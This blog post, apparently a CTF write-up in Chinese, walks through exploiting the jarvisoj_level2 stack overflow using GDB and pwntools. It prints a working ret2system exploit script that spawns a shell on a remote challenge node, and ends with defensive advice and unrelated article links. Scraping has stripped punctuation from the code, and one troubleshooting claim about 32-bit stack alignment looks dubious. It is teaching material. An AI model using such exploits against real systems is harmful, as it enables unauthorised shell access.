当前位置：首页 > article >正文

告别盲打：用GDB和Python-pwntools动态调试分析jarvisoj_level2的栈溢出漏洞

article 2026/4/1 0:11:38

逆向工程实战用GDB与pwntools解剖jarvisoj_level2栈溢出漏洞在二进制安全领域栈溢出漏洞一直是攻防演练中的经典课题。今天我们将以jarvisoj_level2这道CTF题目为蓝本深入探讨如何通过GDB动态调试与pwntools脚本的完美配合实现从漏洞发现到利用的全过程解析。不同于静态分析的纸上谈兵我们将聚焦于运行时内存布局的实时观察和交互式攻击验证让漏洞利用的每个环节都变得可视化、可验证。1. 环境准备与初步分析首先需要搭建一个适合动态调试的实验环境。推荐使用Ubuntu 18.04 LTS系统并安装以下工具sudo apt update sudo apt install -y gdb gdb-peda python3-pip pip3 install pwntools获取题目文件后先用基础命令检查二进制文件属性file level2 checksec --filelevel2典型输出结果如下属性值文件类型ELF 32-bit LSBNX保护EnabledCanaryDisabledPIEDisabledRELROPartial关键发现32位程序使用动态链接开启NX不可执行栈排除了shellcode直接注入的可能未启用地址随机化PIE disabled这对我们定位关键地址非常有利2. 静态分析与漏洞定位使用IDA Pro进行反编译重点关注vulnerable_functionint vulnerable_function() { char buf[136]; // 实际分配0x88字节 system(echo Input:); return read(0, buf, 0x100); // 允许读取256字节 }这里出现了典型的栈溢出漏洞缓冲区大小136字节0x88读取长度256字节0x100溢出空间256 - 136 120字节通过计算EBP到返回地址的偏移EBP位于buf136返回地址位于EBP4所以padding长度 136 4 140字节3. GDB动态调试实战启动GDB并设置关键断点gdb -q ./level2 (gdb) b *vulnerable_function0x29 # 停在read调用前 (gdb) b *vulnerable_function0x3a # 停在read返回后运行程序并在第一个断点暂停时检查栈布局(gdb) x/40wx $esp 0xffffd570: 0x00000000 0xffffd58c 0x00000100 0xf7fb5000 0xffffd580: 0xf7fb5000 0xffffd5a8 0x08048496 0x00000001 0xffffd590: 0xffffd654 0xffffd5bc 0x00000000 0xf7ffd000关键内存区域buf起始地址0xffffd58c保存的EBP0xffffd614返回地址位置0xffffd618输入140个A后观察栈变化from pwn import * payload cyclic(140) io process(./level2) io.send(payload)在第二个断点处检查返回地址是否被覆盖(gdb) x/wx 0xffffd618 0xffffd618: 0x6161616b # kaaa的十六进制通过cyclic_find可以计算出精确的padding长度 from pwn import * cyclic_find(0x6161616b) 1404. 构建ROP链与漏洞利用由于开启了NX保护我们采用ret2libc技术。首先确定关键地址# 获取system和/bin/sh地址 (gdb) p system $1 {text variable, no debug info} 0xf7e13660 system (gdb) find system,9999999,/bin/sh 0xf7f4ea0b但这种方法依赖运行时的libc地址。更可靠的方式是利用程序已有的PLT项符号地址systemplt0x08048320/bin/sh0x0804A024构造payload结构[140字节padding] [system地址] [返回地址] [/bin/sh地址]完整利用脚本from pwn import * context(archi386, oslinux) io remote(node5.buuoj.cn, 29654) system_plt 0x08048320 binsh_addr 0x0804A024 ret_addr 0x08048480 # main函数地址用于优雅退出 payload flat( bA*140, p32(system_plt), p32(ret_addr), p32(binsh_addr) ) io.sendline(payload) io.interactive()5. 调试技巧与问题排查在实际操作中可能会遇到以下问题及解决方案问题1payload发送后程序崩溃检查栈对齐32位系统下system调用要求16字节对齐解决方案在payload前添加ret gadget调整栈指针ret_gadget 0x0804843e # 使用ROPgadget查找 payload flat( bA*140, p32(ret_gadget), p32(system_plt), p32(ret_addr), p32(binsh_addr) )问题2远程环境与本地差异使用ldd命令比较libc版本通过泄露技术动态获取地址ldd ./level2 linux-gate.so.1 (0xf7fd7000) libc.so.6 /lib32/libc.so.6 (0xf7e0a000) /lib/ld-linux.so.2 (0xf7fd9000)问题3交互式输入处理使用pwntools的sendlineafter确保时序正确添加适当延迟处理网络波动io.sendlineafter(bInput:, payload)6. 扩展思考与防御措施理解漏洞原理后我们更应关注如何防御此类攻击现代防护技术对比技术防护机制绕过难度ASLR地址随机化中Stack Canary栈保护值高RELRO Full防止GOT表篡改极高PIE代码段随机化高开发安全建议严格限制输入长度使用安全的字符串处理函数启用所有编译期保护选项定期进行安全审计通过这次实战我们不仅掌握了栈溢出漏洞的利用技术更重要的是理解了动态调试在漏洞分析中的关键作用。记住真正的安全研究不在于攻击本身而在于通过理解漏洞本质来构建更安全的系统。

告别盲打：用GDB和Python-pwntools动态调试分析jarvisoj_level2的栈溢出漏洞

相关文章：

告别盲打：用GDB和Python-pwntools动态调试分析jarvisoj_level2的栈溢出漏洞

别再死磕状态机了！用Verilog实现I2C主机/从机，这份可综合代码直接拿去用

Multisim仿真避坑指南：振幅调制器设计时，如何搞定静态工作点和输出幅度？

PX4无人机Offboard模式实战：从Gazebo仿真到真机避坑指南（附Python/C++代码对比）

核心产品强势放量，扭亏为盈的康希诺未来怎么看？

FPGA新手避坑指南：用Xilinx MIG IP核驱动DDR3内存的完整配置流程（以MT41J256M16为例）

Intent-MPC论文复现手记：我是如何用Docker搞定ROS多版本环境隔离的

三角面片优化实战：用Delaunay算法将四边形网格转换为高性能三角网格

【中文文献管理效率提升90%】茉莉花插件：科研工作者的智能文献处理解决方案

WindowsCleaner：告别C盘爆红，让Windows系统重获新生

太阳能家用电池电源市场：预计到2032年将达到98.8亿美元

新手福音：无需github，在快马平台轻松入门第一个web应用

ESP8266高精度脉冲计数波形发生器库

SpringAI集成Ollama实战：从零构建本地AI对话服务

企业内网必看：用U盘搞定Ubuntu服务器Docker离线部署（含依赖树分析）

计算机毕业设计：Python 汽车推荐系统实战 Django框架可视化协同过滤算法数据分析大数据机器学习（建议收藏）✅

学术论文解析神器！OpenDataLab MinerU智能文档理解实测体验

如何快速解锁AMD 780M APU的完整AI性能？终极优化指南

从概念到上线：基于快马平台构建一个功能完备的qun329实战应用

毕业设计实战：基于SSM+MySQL的税务门户网站设计与实现指南

“人工智能+”政策下，企业AI转型的机遇与路径

告别手动抄表！WinCC结合SQL Server和Excel，打造车间级设备运行数据看板

PCB叠层设计原则与高速电路信号完整性优化

游戏服务器开发者的选择：用Fastutil的Object2ObjectOpenHashMap优化NPC数据存储

RTX5 | 消息队列实战 - 中断与线程间的数据桥梁

桌面图标杂乱如何高效管理？NoFences开源工具让文件归类效率提升60%

AI Agent与传统RPA工具有什么本质区别？2026深度解析企业级智能体进化路径

Vue3+Three.js实战：拆解Xtreme1点云标注工具的技术架构

FPGA时序约束实战：Set_Clock_Sense的精准控制与路径优化

什么时候Agent能自己写skill？从极客视角看AI智能体自主进化与实在Agent落地实践